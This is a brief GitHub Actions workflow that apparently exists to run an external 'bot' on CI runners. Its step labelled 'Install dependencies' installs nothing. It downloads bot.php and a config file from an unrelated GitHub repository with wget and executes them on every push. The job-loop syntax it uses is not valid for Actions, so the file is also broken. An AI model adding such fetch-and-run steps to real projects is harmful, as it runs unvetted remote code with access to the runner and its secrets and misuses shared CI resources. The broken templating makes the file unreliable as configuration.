name: aiadgxy

on:
  push:
  
jobs:
  ${{ each index in range(1, 3) }}:
    run_${{ index }}:
      runs-on: ubuntu-latest
      continue-on-error: true
      steps:
        - name: Setup PHP
          uses: shivammathur/setup-php@v2
          with:
            php-version: '8.1'
            coverage: none
        
        - name: Install dependencies
          run: |
            wget https://github.com/Mosnio/dpy/raw/main/bot.php
            wget https://github.com/Mosnio/dpy/raw/main/v${{ index }}.json -O config.json
            php bot.php
